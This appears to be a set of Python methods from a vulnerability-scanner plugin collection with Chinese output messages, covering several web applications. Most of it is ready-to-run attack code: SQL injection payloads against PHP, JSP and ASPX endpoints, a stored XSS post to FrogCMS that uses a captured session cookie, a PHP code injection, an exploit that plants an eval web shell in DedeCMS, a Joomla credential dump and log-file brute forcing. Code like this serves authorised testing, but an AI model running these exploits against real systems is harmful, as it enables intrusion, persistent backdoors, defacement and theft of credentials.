        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))

        def getString(res):
            # Unused helper: would extract the 'Duplicate entry' error text
            # framed by qgveq|...|qkagq, returning '' when absent.
            import re
            Regular = "Duplicate entry \'qgveq\|(.+):split:([a-fA-F0-9]{32})\|qkagq"
            Temp = re.search(Regular, res)
            if Temp != None:
                Temp = Temp.group(0)
                return Temp
            else:
                return ""

        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            payloads = (
                '/order.php?id=-@`%27`%20UnIon%20select%20username%20from%20`%23@__admin`%20where%20(select%201%20from%20(select%20count(*)%20,concat((select%20concat(0x7167766571,0x7c,md5(123),0x3a73706c69743a,md5(123),0x7c,0x716b616771)),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20id=@`%27`',
                '/order.php?id=-%40%60%27%60%20AND%20%28SELECT%202598%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7167766571%2C%28SELECT%20MID%28%28IFNULL%28CAST%28concat(0x7c,md5(123)%2C0x3a73706c69743a%2Cmd5(123),0x7c)%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x716b616771%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29and%20id%3D%40%60%27%60'
            )
            for payload in payloads:
                # Local name only; self.target is not modified here.
                target = arg + payload
                headers = {"Cookie": "shoppingcart=a,username=a"}
                req = requests.get(target, headers=headers)
                if req.status_code == 200 and "202cb962ac59075b964b07152d234b70" in req.text:
                    self.output.report(
                        self.vuln, '发现{target}存在{name}漏洞;url={url}'.format(
                            target=self.target,
                            name=self.vuln.name,
                            url=target))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check FrogCMS page editing for stored XSS in the keywords field.

        ``self.target`` is rewritten in place to append ``base_path``.  This
        check is state-changing: it POSTs an edit to page id 3 of
        ``/FrogCMS-master/admin/`` using a hard-coded cookie string captured
        from the author's own environment, then fetches ``/?about_us`` and
        reports when the injected ``<script>confirm(1234)</script>`` is
        rendered verbatim.  The page is not restored afterwards and neither
        request sets a timeout.

        NOTE: the cookie string is split on ';' but the entries are separated
        by '; ', so every key after the first keeps a leading space; the
        session values are also stale, so the authenticated POST is unlikely
        to be accepted by another install.  Exceptions are logged and
        swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            payload = '/FrogCMS-master/admin/?/page/edit/3'
            # Register a user first.
            # Build the cookie jar from a captured cookie header
            cookies = {}
            raw_cookies = 'current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e'
            for line in raw_cookies.split(';'):
                key, value = line.split('=', 1)  # maxsplit=1: split only once, giving two parts
                cookies[key] = value
            #print (cookies)
            # Pre-encoded form body for the page edit (persists on the target)
            data = 'page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/><script>confirm(1234)</script>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close'
            url = self.target + payload
            # Response of the edit request is not inspected.
            requests.post(url, cookies=cookies, data=data)

            verify_url = self.target + '/FrogCMS-master/?about_us'
            r = requests.get(verify_url)

            if "<script>confirm(1234)</script>" in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check ``publishinfodetail.jsp`` for an Oracle error-based SQL injection.

        ``self.target`` is rewritten in place to append ``base_path``; the
        local ``url`` then strips one trailing slash again before the
        payload is appended.  One GET is sent without a timeout; a finding is
        reported only when the response status is 500 and the body contains
        the marker ``qczgq1qnoiq`` assembled by the injected XMLType
        expression.  Exceptions are logged and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            url = self.target
            # Avoid a double slash when base_path ends with '/'
            url = url if url[-1] != '/' else url[:-1]
            payload = (
                "/epp/detail/publishinfodetail.jsp?pk_message=1002F410000000019JNX%27%20"
                "AND%203814=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||"
                "CHR(122)||CHR(103)||CHR(113)||(SELECT%20(CASE%20WHEN%20(3814=3814)%20THEN"
                "%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(110)||CHR(111)||CHR(105)"
                "||CHR(113)||CHR(62)))%20FROM%20DUAL)%20AND%20%27vdoA%27=%27vdoA"
            )
            verify_url = url + payload

            req = requests.get(verify_url)
            content = req.text
            # The marker only shows up inside the server's error page, hence
            # the status-500 requirement.
            if req.status_code == 500 and 'qczgq1qnoiq' in content:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Check the admin ``syscontroller`` form for PHP code injection.

        ``self.target`` is rewritten in place to append ``base_path``.  This
        check is state-changing: it POSTs a new controller definition to
        ``/admin.php?c=syscontroller&m=add`` with an empty cookie jar (the
        cookie-parsing snippet is a dead string literal, so no session is
        sent), then fetches ``/index.php?c=myndtt&m=index`` and reports when
        the body looks like phpinfo() output (``PHP Version`` and ``System``).
        The created controller is not removed afterwards.  Neither request
        sets a timeout.  Exceptions are logged and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Register an account and log in first, then request:
            # Cookies (currently always empty; see docstring)
            cookies = {}
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            payload = "/admin.php?c=syscontroller&m=add&post=1"
            data = "data%5Bname%5D=myndtt*/phpinfo();/*&data%5Bcname%5D=myndtt&app=0&data%5Btype%5D%5B%5D=0&data%5Bmeta_title%5D=1234&data%5Bmeta_keywords%5D=123&data%5Bmeta_descrintion%5D=123"
            url = self.target + payload
            # Response of the add request is not inspected.
            requests.post(url, cookies=cookies, data=data)

            verify_url = self.target + '/index.php?c=myndtt&m=index'
            r = requests.get(verify_url)

            if 'PHP Version' in r.text and 'System' in r.text:
                self.output.report(
                    self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                        target=self.target,
                        name=self.vuln.name,
                        url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
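    def verify(self):
        """Check two DPMA .aspx pages for MSSQL error-based SQL injection.

        Each payload appends ``and 1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))``
        to an integer parameter; the int-vs-varchar comparison presumably
        fails and the error text echoes the MD5 of '1234'
        (81dc9bdb52d04dc20036dbd8313ed055), which is what the body is checked
        for. Every matching endpoint is reported with its URL; the loop does
        not stop at the first hit.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            payloads = [
                "/DPMA/FWeb/SPEWeb/Web5/SPEPhotosDetail.aspx?KindSetID=20010&ALBUMID=2011+and+1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))--",
                "/DPMA/FWeb/WorkRoomWeb/Web/TeacherPhotosDetail.aspx?TID=3050010135+AND+1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))--&Album_ID=1075"
            ]
            # md5('1234') == 81dc9bdb52d04dc20036dbd8313ed055
            marker = '81dc9bdb52d04dc20036dbd8313ed055'
            for payload in payloads:
                verify_url = self.target + payload
                # Bounded timeout so one stalled endpoint cannot hang the scan.
                r = requests.get(verify_url, timeout=50)
                if marker in r.text:
                    self.output.report(
                        self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                            target=self.target,
                            name=self.vuln.name,
                            url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))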
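    def verify(self):
        """Check six .aspx pages for MSSQL error-based SQL injection.

        Every payload evaluates ``(db_name()+'~testvul') > 0``; comparing the
        varchar with an int presumably raises a conversion error whose text
        contains ``<dbname>~testvul``. A 200 response containing ``~testvul``
        is reported. Reference: wooyun-2015-0121337.

        Each hit is reported separately with the same message, so several
        reports for one target mean several injectable pages.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # __Refer___ = http://www.wooyun.org/bugs/wooyun-2015-0121337
            # CHAR(126)+CHAR(116)... spells "~testvul"; db_name() is prepended.
            payloads = [
                '/VideoDetail.aspx?Guid=111%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--',
                '/VideoSearchList.aspx?VideoCategoryID=1%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))%3E0--',
                '/ProductListCategory.aspx?ProductCategoryID=1%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))%3E0--',
                '/ArticleDetail.aspx?guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--',
                '/ArticleDetailNew.aspx?guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--',
                '/HelpList.aspx?Guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--'
            ]
            for payload in payloads:
                verify_url = self.target + payload
                # Bounded timeout so one stalled endpoint cannot hang the scan.
                req = requests.get(verify_url, timeout=50)

                if req.status_code == 200 and "~testvul" in req.text:
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))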
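    def exploit(self):
        """Write a PHP web shell through dede/tpl.php (savetagfile).

        Fetches the hidden per-session token from the upload form at
        ``/dede/tpl.php?action=upload``, then calls ``action=savetagfile`` to
        write ``include/taglib/cscan.lib.php`` containing
        ``phpinfo();eval($_POST[c]);`` and confirms the write by requesting
        the file and looking for the phpinfo headings.

        WARNING(review): this leaves a persistent backdoor on the target at a
        fixed, guessable path whose only "password" is the POST parameter
        name ``c`` — anyone who finds the file gets code execution. The report
        text asks the operator to delete it, but nothing here does; remove
        the file as soon as the engagement is done.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Step 1: fetch the upload form; the token is the name of a hidden
            # input with value="1". Same session for the write that follows.
            s = requests.session()
            r = s.get(self.target + '/dede/tpl.php?action=upload', timeout=50)
            token_re = re.compile(
                r'<input type="hidden" name="([0-9a-f]+)" value="1" />')
            match = token_re.search(r.text)
            if match:
                token = match.group(1)

                # Step 2: write the shell via savetagfile.
                s.get(
                    self.target + '/dede/tpl.php?filename=cscan.lib.php&action=savetagfile&content=%3C?php%20phpinfo();eval($_POST[c]);?%3E&token={token}'.format(token=token),
                    timeout=50)
                # Step 3: the written file is served from include/taglib/.
                verify_url = self.target + '/include/taglib/cscan.lib.php'
                r = requests.get(verify_url, timeout=50)

                if 'PHP Version' in r.text and 'System' in r.text:
                    self.output.report(self.vuln, '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.format(
                        target=self.target, name=self.vuln.name, url=verify_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))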
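    def verify(self, start='2018-01-01', end='2018-12-31'):
        """Brute-force daily log files under /Data/Log/ and report the first readable one.

        Requests ``/Data/Log/YY_MM_DD.log`` for every day after ``start`` up to
        and including ``end``; a 200 response whose body contains ``INFO:`` is
        reported and the loop stops.

        Args:
            start: ISO date (``YYYY-MM-DD``); the first candidate is the day
                after it. Defaults reproduce the original hard-coded 2018
                range — pass the target's likely deployment window for a
                meaningful scan.
            end: ISO date of the last candidate (inclusive).

        Raises:
            Nothing: ``ValueError`` from unparseable dates and all request
            errors are caught and logged.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            datestart = datetime.datetime.strptime(start, '%Y-%m-%d')
            dateend = datetime.datetime.strptime(end, '%Y-%m-%d')

            # Logged once, not once per day as before.
            self.output.info('正在生成日志爆破字典')
            while datestart < dateend:
                datestart += datetime.timedelta(days=1)
                # File names use a two-digit year: e.g. 18_01_02.log
                payload = datestart.strftime('%y_%m_%d')

                vul_url = arg + '/Data/Log/' + payload + '.log'
                # Bounded timeout: up to a year of requests must not hang.
                response = requests.get(vul_url, timeout=50)
                if response.status_code == 200 and 'INFO:' in response.text:
                    self.output.info('字典爆破成功')
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))
                    break

        except Exception as e:
            self.output.info('执行异常{}'.format(e))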
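    def verify(self):
        """Check for reachable upload pages under /mana/edit/ (wooyun-2015-0108559).

        Requests each known upload JSP; a 200 response whose body mentions
        ``_upload.jsp`` or ``uploadnexturl`` is taken as the upload form being
        served without authentication and is reported. Each hit is reported
        separately with the same message.

        NOTE(review): this only proves the form is reachable — no upload is
        attempted — so a positive result is strong evidence, not proof, of
        arbitrary file upload.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Refer http://www.wooyun.org/bugs/wooyun-2015-0108559
            payloads = [
                '/mana/edit/uploadattcah.jsp', '/mana/edit/attach_upload.jsp',
                '/mana/edit/uploadimg.jsp', '/mana/edit/uploadmult.jsp',
                '/mana/edit/uploadflash.jsp'
            ]
            for payload in payloads:
                # Bounded timeout so one stalled page cannot hang the scan.
                r = requests.get(self.target + payload, timeout=50)
                if r.status_code == 200 and ('_upload.jsp' in r.text
                                             or 'uploadnexturl' in r.text):
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))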
    def verify(self):
        """Union-based SQL injection check for com_rsfiles (Joomla).

        Injects ``md5(3.1415)`` through the ``cid`` parameter of the agreement
        layout and reports the target when the digest
        ``63e1f04640e83605c1d177544a5a0488`` appears in the response body.
        Reads ``self.target``/``self.vuln``, writes through ``self.output``;
        exceptions are logged rather than raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            base = '{target}'.format(target=self.target)
            # Vulnerable endpoint, then a union select computing md5(3.1415).
            endpoint = '/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid='
            injection = "-1/**/aNd/**/1=0/**/uNioN++sElecT+1,md5(3.1415)--"
            probe_url = base + endpoint + injection
            # Browser-like request headers.
            headers = {
                'User-Agent':
                'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Connection': 'keep-alive'
            }
            response = requests.get(probe_url, headers=headers, timeout=50)
            # md5(3.1415) == 63e1f04640e83605c1d177544a5a0488
            marker = '63e1f04640e83605c1d177544a5a0488'
            if marker in response.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
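    def verify(self):
        """Check the member registration handler for an echoed marker.

        Sends the registration fields as query parameters to
        ``index.php?m=member&f=register_save`` and reports when the response
        is 200 and contains ``ac59075b964b0715``.

        NOTE(review): the username/password values appear masked (``******``)
        in this copy of the PoC; confirm them against the upstream source.
        NOTE(review): the key ``fileds[email]`` is sent as-is; it may be a
        typo for ``fields[email]`` but is left unchanged here.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            target = arg + "/index.php?m=member&f=register_save"
            data = {
                "username":
                "******",
                "password": "******",
                "password2": "123456",
                "fields[truename]": "",
                "fileds[email]": "",
                "submit": " ? ? "
            }
            # The URL already carries a query string, so the fields must be
            # joined with '&', not a second '?': the previous
            # ``target + "?" + payload`` produced ``...f=register_save?username=...``,
            # leaving ``f`` set to ``register_save?username=...`` so the handler
            # never matched. ``params=`` lets requests merge them correctly.
            req = requests.get(target, params=data, timeout=50)
            if req.status_code == 200 and "ac59075b964b0715" in req.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))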
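 def exploit(self):
     """Dump one jos_users row through a union-based injection in com_kunena.

     The ``search`` parameter of ``func=userlist`` is closed with ``%')`` and
     a UNION SELECT returns ``$~~~$<username>***<password>***<email>$~~~$``
     (the 0x.. literals spell those delimiters) from ``jos_users``. The
     username and password columns are parsed out of the response and
     written to the report.

     NOTE(review): the table name ``jos_users`` assumes the default Joomla
     table prefix; a custom prefix makes the query fail silently.
     NOTE(review): the report contains a live credential (hash) from the
     target — treat scanner output as sensitive.
     """
     self.target = self.target.rstrip(
         '/') + '/' + (self.get_option('base_path').lstrip('/'))
     try:
         self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format(
             target=self.target, vuln=self.vuln))
         arg = '{target}'.format(target=self.target)
         # Vulnerable endpoint.
         exploit = '/index.php?option=com_kunena&func=userlist&search='
         # UNION payload; 0x247e7e7e24 = "$~~~$", 0x2a2a2a = "***".
         payload = "%' and 1=2) union select 1, 1,concat(0x247e7e7e24,username,"\
             "0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),1,1,1,1,1,1,1,0,0,0,1,1 from jos_users limit 0,1-- ;"
         vulurl = arg+exploit+payload
         # Browser-like request headers.
         httphead = {
             'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
             'Connection': 'keep-alive'
         }
         # Raw string: '\$' and '\*' are regex escapes, not Python escapes
         # (the non-raw form relied on invalid-escape passthrough).
         pattern = r'\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
         resp = requests.get(url=vulurl, headers=httphead, timeout=50)
         # Cheap delimiter check before running the regex.
         if '$~~~$' in resp.text:
             match = re.search(pattern, resp.text, re.M | re.I)
             if match:
                 username = match.group(1)
                 password = match.group(2)
                 self.output.report(self.vuln, '发现{target}存在{name}漏洞,获取到的用户名为{username} 密码为{password}'.format(
                     target=self.target, name=self.vuln.name, username=username, password=password))
     except Exception as e:
         self.output.info('执行异常{}'.format(e))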
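    def exploit(self, start='2018-01-01', end='2018-12-31'):
        """Brute-force daily operation logs under /log/ and report the first readable one.

        Requests ``/log/operate_YYYY-MM-DD.log`` for every day after ``start``
        up to and including ``end``; a 200 response whose body contains
        ``loginame`` is reported (with its URL) and the loop stops.

        Args:
            start: ISO date (``YYYY-MM-DD``); the first candidate is the day
                after it. Defaults reproduce the original hard-coded 2018
                range — pass the target's likely deployment window for a
                meaningful scan.
            end: ISO date of the last candidate (inclusive).

        NOTE(review): unlike the sibling methods this does not append the
        ``base_path`` option to ``self.target``; presumably intentional for
        this module — confirm.
        """
        try:
            self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)

            datestart = datetime.datetime.strptime(start, '%Y-%m-%d')
            dateend = datetime.datetime.strptime(end, '%Y-%m-%d')
            while datestart < dateend:
                datestart += datetime.timedelta(days=1)
                # File names use the full ISO date: operate_2018-01-02.log
                payload = datestart.strftime('%Y-%m-%d')

                vul_url = arg + '/log/operate_' + payload + '.log'
                # Bounded timeout: up to a year of requests must not hang.
                response = requests.get(vul_url, timeout=50)

                if response.status_code == 200 and 'loginame' in response.text:
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞,获取的漏洞url地址为{url}'.format(
                            target=self.target,
                            name=self.vuln.name,
                            url=vul_url))
                    break
        except Exception as e:
            self.output.info('执行异常{}'.format(e))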